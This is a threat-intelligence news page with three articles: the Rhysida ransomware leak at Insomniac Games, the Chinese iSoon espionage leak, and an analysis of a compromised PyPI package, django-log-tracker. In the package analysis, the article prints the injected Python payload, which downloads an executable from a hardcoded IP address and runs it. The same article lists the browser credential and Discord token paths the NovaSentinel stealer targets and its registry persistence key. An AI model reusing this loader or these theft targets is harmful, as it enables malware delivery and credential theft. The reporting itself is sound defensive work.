company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO/CTO

DevOps Engineer

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

Cyberspying

loading..
loading..
loading..

Iranian Hackers spying on UAE, Kuwait Government Agencies using ScreenConnect

UAE and Kuwait government agencies both are targets of a new cyber spying campaign potentially approved out by Iranian threat actors

11-Feb-2021
3 min read

Related Articles

loading..

Sony

Rhysida

Rhysida gang in November, resulting in the theft and leak of sensitive employee ...

Insomniac Games, a subsidiary of Sony Interactive Entertainment, fell victim to a ransomware attack by the Rhysida gang in November, resulting in the theft and leak of sensitive employee data. This breach raises critical concerns about cybersecurity measures within the gaming industry. #### Background Insomniac Games, renowned for titles like Spider-Man and Spyro the Dragon, faced a daunting challenge when Rhysida demanded a $2 million ransom. Despite Sony's investigation, negotiations failed, leading to the leakage of 1.67 TB of data, including personal information and sensitive contracts. #### Rhysida Gang Rhysida, notorious for attacks on government institutions and healthcare organizations, poses a significant threat with its ransomware-as-a-service (RaaS) model. Its emergence in 2023 marked a wave of cyberattacks, highlighting vulnerabilities across various sectors. #### Industry Impact Insomniac Games joins a growing list of gaming giants targeted by cybercriminals, including Rockstar, Activision Blizzard, and Ubisoft. These incidents underscore the urgent need for robust cybersecurity protocols within the gaming industry to safeguard sensitive data. #### Response and Mitigation In response to the breach, Insomniac Games and Sony have extended ID Watchdog services and provided two additional years of complimentary credit monitoring. This proactive approach aims to mitigate the impact on affected employees and prevent further exploitation of stolen data.

loading..   24-Feb-2024
loading..   2 min read
loading..

Python

NovaSentinel

Uncover how a compromised PyPI package deployed the NovaSentinel stealer supply ...

The recent compromise of the dormant Python package "django-log-tracker" on PyPI highlights the insidious threat of supply chain attacks. On February 21, 2024, a malicious update, disguised as innocuous, injected the NovaSentinel information stealer into the package. This [Threatfeed](https://www.secureblink.com/cyber-security-news) dissects the attack, explores NovaSentinel's capabilities, and underscores the need for heightened vigilance in open-source security. ## Malicious Update: A Magnified Look The attacker meticulously obscured their intent by removing most of django-log-tracker's original functionality. The remaining __init__.py and example.py files contained the malicious payload: `Python` `import wget` `import os` `URL = "http://45.88.180.54/DONTTUCHTHIS/Updater_1.4.4_x64.exe"` `fileName = "Updater_1.4.4_x64.exe"` `appdataRoamingPath = os.getenv('APPDATA')` `fullPath = os.path.join(appdataRoamingPath, fileName)` `response = wget.download(URL, fullPath)` `os.startfile(fullPath)` Though simple, this [code](https://docs.python.org/3/library/os.html#os.startfile) initiates a damaging sequence: downloading an executable from a suspicious location and immediately executing it. ## NovaSentinel Stealer: Exposing its Capabilities The downloaded "Updater" is an NSIS installer, a common tactic for masking malicious payloads. Extracting the installer's contents reveals an Electron app – a prime vehicle for obfuscating code. Within the heavily obfuscated JavaScript lies the heart of the attack: the NovaSentinel stealer. ***NovaSentinel's primary objective is data theft. It targets:*** *Browsers:* Saved passwords, autofill data, cookies, browsing history *Cryptocurrency Wallets:* Keys and seed phrases for various blockchains **Communication Apps:** Discord tokens, potentially granting access to accounts and servers **Gaming Credentials:** Minecraft, Roblox, etc. **System Data:** Wi-Fi passwords, WinSCP credentials ### Persistence Mechanisms NovaSentinel seeks to establish a foothold within the compromised system. It attempts to inject itself into: - Chrome - Discord - Exodus, Mullvad, Atomic, and MailSpring (cryptocurrency, VPN, and email clients) ### Exfiltration and Impact NovaSentinel likely transmits stolen data to a command-and-control server operated by the attacker. The consequences for victims can be severe: Financial loss through cryptocurrency theft Account compromise on various platforms Identity theft and fraud ### NovaSentinel's Clipboard Hijacker Analysis discloses a configuration file for a clipboard hijacker component. This highlights the attacker's intent to steal cryptocurrency by replacing wallet addresses: `JSON` `{ "ltc_address": "LUkCrDuUBPGH9uVQQHFS5hyi1xPJ38cbUb", "xlm_address": "GBYNIZIJWZT7I2VTCVASDKIM6OXRKNRN4MVS6NTG2L23EIBQENPS5ZA7", ... // Additional addresses }` ## Implications and Defense Strategies **Supply Chain Vulnerabilities:** This attack demonstrates how even dormant packages can endanger projects with flexible dependencies. **Open-Source Trust:** Trust in the open-source ecosystem must be balanced with vigilance. **Proactive Measures:** ~ Pin project dependencies to exact versions ~ Conduct regular code audits, including third-party dependencies ~ Implement vulnerability scanning tools ~ Adopt a layered security approach (endpoint protection, network monitoring, user education) ## NovaSentinel: Targeting Browsers NovaSentinel's browser-focused component is designed to pillage vast amounts of sensitive user data. ***Here's a breakdown of its potential methods:*** **SQLite Database Extraction:** Browsers like Chrome and Firefox store passwords, autofill data, cookies, and history in SQLite databases. NovaSentinel likely copies these database files for exfiltration. Decoding and parsing the contents would give the attacker access to a treasure trove of information. **Targeting Chromium-based Browsers:** NovaSentinel might specifically target Chromium-based browsers due to their popularity and shared code structure. It could leverage these commonalities to extract: ~ **Login Data:** Saved usernames and passwords from the "Login Data" file. ~ **Cookies:** Session cookies used for authentication could be hijacked to impersonate victims on active sessions. ~ **Credit Card Data:** Saved credit card information from the _"Web Data"_ file. **Keylogging:** While less common in pre-packaged stealers, NovaSentinel could be modified to include a keylogging module. This would allow it to record every keystroke typed by the user, providing a live stream of passwords and other sensitive input. ## Discord Token Abuse: Beyond Account Takeover Discord tokens are more than just keys to unlock accounts. ***Here's how NovaSentinel might weaponize them:*** **Social Engineering:** Stolen tokens allow the attacker to impersonate the victim, potentially fooling friends or server members into divulging sensitive information or downloading malware. **Spreading Malware:** The attacker could leverage compromised accounts to distribute infected files or links to other users within Discord servers, amplifying the attack's reach. **Server Reconnaissance:** If the victim is a member of high-value Discord servers (related to cryptocurrency, gaming, etc.), the attacker can gain valuable insights into potential targets or gather intelligence before launching tailored attacks. **Token Reselling:** Discord tokens have a market value on darknet forums. NovaSentinel could reflect functionality to collect tokens even without immediate exploitation, selling them in bulk to other attackers. ## How NovaSentinel Could Extract Data from SQLite Databases **Locating Target Databases:** NovaSentinel will first need to identify where browsers store their sensitive data. Common database file paths include: Chrome: `%LocalAppData%\Google\Chrome\User Data\Default\Login Data` Firefox: `%AppData%\Mozilla\Firefox\Profiles\xxxxxxxx.default\logins.json` (and related files) **Copying the Databases:** The stealer likely makes a direct copy of these target database files. This allows for offline exfiltration and minimizes suspicious interactions with the files that might trigger antivirus software. **SQLite Library or Custom Parsing:** To actually extract valuable information, NovaSentinel has two primary options: Embedded SQLite Library: It could directly include a lightweight SQLite library within its code to interact with the database files. This gives it flexibility but may increase the malware's file size. - **Custom Parser:** If the stealer prioritizes a small footprint, it might contain a custom parser built specifically to understand the structure of browser databases and extract the desired fields (e.g., usernames, passwords, URLs). - - **Data Extraction:** Regardless of the method, the key goal is to parse the database contents, focusing on tables or files within the database that house these elements: • Passwords and usernames • Autofill data (addresses, credit card information) • Cookies • Browsing history **Exfiltration:** The extracted data is likely compiled into a structured format (text file, JSON, etc.) and prepared for transmission to the attacker's command-and-control (C2) server. ## Mechanics of Discord Token Abuse **Token Location:** NovaSentinel needs to find where Discord stores user authentication tokens. These are typically located in: `%AppData%\Discord\Local Storage\leveldb\` (Windows) `~/Library/Application Support/discord/Local Storage/leveldb/` (macOS) **Extracting Tokens:** LevelDB databases might not follow a standard structure. NovaSentinel may use a custom parsing routine to search for strings that fit the pattern of Discord tokens (they often have a specific format). **Making API Requests:** With the token, NovaSentinel can make authenticated API calls to the Discord server, impersonating the victim. Here are a few malicious possibilities: Send Messages: Post messages as the victim in private chats or servers. Read Message History: Access message logs, potentially uncovering sensitive information. Modify User Settings: Change the victim's profile, status, or even password (if no MFA is present). Join Servers: Automatically join the victim to new servers under the attacker's control. Gather Server Information: List members, channels, and roles of servers the victim belongs to. Discord has safeguards to prevent excessive use of its API. NovaSentinel may need to spread its malicious actions over time or use multiple stolen tokens to avoid triggering these limits. Discord and antivirus vendors are constantly improving their detection of token abuse. NovaSentinel might frequently change its techniques to remain evasive. #### Persistence Mechanisms NovaSentinel's persistence strategies likely involve a combination of techniques to maximize its chances of remaining embedded in a compromised system. Here are some possibilities: **Modifying Startup Entries:** NovaSentinel might add itself to the Windows Registry startup keys `(HKCU\Software\Microsoft\Windows\CurrentVersion\Run)` or create scheduled tasks to ensure it runs upon system boot or at regular intervals. **Hijacking Browser Extensions:** Injecting malicious code into existing browser extensions provides a stealthy way to maintain persistence while also potentially opening avenues for further data theft and monitoring. **File Masquerading:** NovaSentinel tends to disguise itself as a legitimate-looking system or application file, using recognizable icons and names to avoid detection. #### Obfuscation and Anti-Analysis Tactics **JavaScript Obfuscation:** The heavily obfuscated JavaScript code we observed is a common tactic to hinder analysis. NovaSentinel might more likely employ multiple obfuscation layers, including variable renaming, string encoding, and control flow obfuscation. **Anti-Debugging and Anti-VM:** It might include checks for the presence of debuggers or virtual machine environments. If detected, the malware could exit or alter its behavior to make analysis more difficult. **Packers and Crypters:** The NSIS installer itself could be just the first layer. NovaSentinel might further utilize packers or crypters to compress and encrypt its core components, adding an extra barrier for reverse engineers. ### Network Communication and Exfiltration **Command-and-Control (C2) Communication:** NovaSentinel likely establishes a communication channel with a server controlled by the attacker. This could be via: Hardcoded IP addresses or domains Domain Generation Algorithms (DGAs) for resilience **Exfiltration Protocols:** It might use common protocols like HTTP or HTTPS to blend in with regular web traffic. Additionally, it could leverage stealthier protocols like DNS tunneling to hide its exfiltration activities.

loading..   24-Feb-2024
loading..   8 min read
loading..

APT

China's State-Backed Hackers Exposed: iSoon Leaked Data Reveals Global Targets, ...

A trove of leaked documents, originally found on GitHub before being removed, has ripped open the underlying functioning of China's secretive cyber espionage operations. These leaks center on the company iSoon presenting as a contradictory facade, posing as a cybersecurity firm while facing credible allegations of acting as an _"Advanced Persistent Threat (APT)-for-hire."_ Though direct links to the Chinese government remain difficult to conclusively prove, security experts widely suspect state sponsorship. This breach exposes China's tactics, India's critical position as a prime target, and the alarming new model of using private hackers to execute state-backed cyber espionage. ## Inside iSoon – Anatomy of a Cyber Espionage Operation I-Soon, also referred to as [Anxun](https://github.com/soufianetahiri/Anxun-isoon/tree/main/OCRd_images) in Mandarin, operates as a Chinese firm purportedly specializing in public network security and digital intelligence solutions. Despite its outward facade, leaked data suggests a more clandestine role, potentially functioning as an "Advanced Persistent Threat (APT)-for-hire," collaborating with entities such as the Chinese Ministry of Public Security (MPS) and potentially other state agencies. Here's a brief overview of I-Soon: - **Founded:** 2010 - **Headquarters:** Shanghai, China - **Services:** Cybersecurity, digital intelligence - **Allegations:** Cyber espionage, hacking, surveillance, targeting governments, businesses, and individuals The company garnered attention in February 2024 following a substantial data leak. The leaked information comprised contracts, communications, and other documents seemingly affirming I-Soon's involvement in cyber espionage endeavors. Specifically, I-Soon (上海安洵) serves as a contractor for various PRC agencies, including the Ministry of Public Security, Ministry of State Security, and People’s Liberation Army. The leaked data, which surfaced over the weekend of February 16th, offers a rare glimpse into the internal workings of a state-affiliated hacking contractor. Leaked chats also reveal the dominance of a user named "lengmo," implying a leadership role. Intense communication between "lengmo" and "Shutd0wn" hints at internal hierarchies and potential influences within iSoon's operations. However, the authenticity of the leaked documents remains uncertain. While the contents of the leak validate public threat intelligence, efforts to corroborate the documents are ongoing. Message timestamps show peak activity aligns with Chinese work hours. While operational schedules can shift, this predictability could potentially offer defenders a vulnerability to exploit. iSoon's arsenal includes custom malware targeting a range of operating systems (Windows, macOS, Linux, iOS, Android), social media infiltration tools, hardware for physical attacks, and OSINT-driven reconnaissance capabilities. Sources like Mandiant Intelligence corroborate these findings. Leaked chats expose internal financial pressures, employee complaints about low pay, and a sense of demoralization within the company. This instability could increase security risks on the attacker side and offer potential avenues for counterintelligence efforts. iSoon's suspected origins in Chengdu, an infamous hub for Chinese hacker-for-hire groups, highlight the city's significance in state-sponsored cyber warfare operations. Security analysts, including John Hultquist of Mandiant Intelligence, authenticate the leaked data, emphasizing its significance in understanding China's cybersecurity capabilities. The involvement of iSoon, allegedly linked to the Chinese government, reinforces suspicions of state-sponsored cyber espionage. ## Victims – China's Global Espionage Web and India's Critical Role A leaked spreadsheet verifies at least 80 successful overseas attacks by iSoon. Among these are staggering data breaches, including 95.2 gigabytes of Indian immigration data, 3 terabytes of call logs from South Korean telecom provider LG U Plus, and 459 gigabytes of sensitive Taiwanese mapping data. On Tuesday, a user on social media platform X who goes by the moniker [Dakota Cary](https://x.com/DakotaInDC?t=8DwfPjPEQvqa_FPZiLvMmw&s=09) brought certain evidence based allegations regarding the leakage of documents from Chinese cyber agencies on GitHub. The user asserted that these documents included data from the EPFO, the Indian PMO, and a range of public and private organizations. Prominent Indian targets actually include the Prime Minister's Office (PMO), the Ministry of Finance, the Ministry of External Affairs, and private entities like EPFO, BSNL, Apollo Hospitals, and Air India. The leaked documentation reveals a shocking capability of the attackers to infiltrate both Android and iOS devices, extracting a treasure trove of sensitive data. From hardware specifics to GPS coordinates, contact lists, media files, and even live audio recordings, nothing seems beyond their grasp. Adding to the intrigue, reports suggest the use of discreet gadgets resembling common Chinese portable batteries, ingeniously deployed to inject malicious code into targeted Android devices via unsuspecting WiFi signals. These breaches pose severe threats to national security, and individual privacy, and undermine India's economic competitiveness. iSoon's tools are used to monitor and suppress minority groups within China and track overseas Chinese communities. This reveals how China leverages cyberwarfare for internal control and the surveillance of perceived dissidents. Confirmed targets extend beyond India to Vietnam, Indonesia, Nigeria, and others. Even discussions about targeting NATO, while likely complex to execute, showcase the vast scope of China's cyber ambitions and its willingness to consider even heavily defended entities as potential victims. Analysts have distinguished intriguing parallels between iSoon and various established Chinese APTs, especially APT41. According to Adam Meyers, leading the charge in counter adversary operations at CrowdStrike, the group's maneuvers and infrastructure bear a striking resemblance to those attributed to Aquatic Panda (known by aliases like Budworm, Charcoal Typhoo, ControlX, RedHotel, and BRONZE UNIVERSITY). Within the trove of over 500 leaked documents lie a wealth of materials, including promotional content, operational guides, rosters of clients and staff, exchanges via WeChat between clients and staff, and a host of other undisclosed files. ## Ecosystem – China's Hacker Marketplace iSoon is just one player in a complex network of state-backed hackers-for-hire operating with a blend of patriotic and profit-driven motives. China has pioneered an insidious model, outsourcing hacking operations to private companies. This provides plausible deniability, and increased scalability, and encourages innovation through internal competition. Leaked contracts expose surprisingly low prices for attacks on sensitive targets. This significantly expands the pool of potential victims and amplifies the threat on a global scale. The lawsuit between iSoon and the indicted group Chengdu 404, along with anecdotes like the "drinking committee," illustrates the blurry lines between rival and cooperating entities within China's state-sanctioned hacking industry. ## Expert Analysis, India's Vulnerability, and Global Response While definitively proving Chinese government control remains elusive, the cybersecurity community strongly leans towards the iSoon leak exposing another weapon in China's cyber arsenal. Quotes from leading experts at Mandiant Intelligence and other firms underscore the leak's significance, with insights extending beyond the technical details into China's strategic goals. Budget models designed to defend against traditional APTs fall short against state-backed entities like iSoon, which undercut legitimate security providers. Previous cyberattacks on India can now be linked to the scale of operations revealed in the iSoon leak. India is one among many nations targeted; the leak underscores a global threat. Only through information sharing, coordinated law enforcement efforts, and a united front demanding accountability from China can this onslaught be effectively countered. Beyond India, China's cyber operations extend to countries like Pakistan, Nepal, and Myanmar, highlighting a broader geopolitical agenda. The theft of data from governmental and institutional entities across various nations underscores China's aggressive cybersecurity strategy.

loading..   24-Feb-2024
loading..   7 min read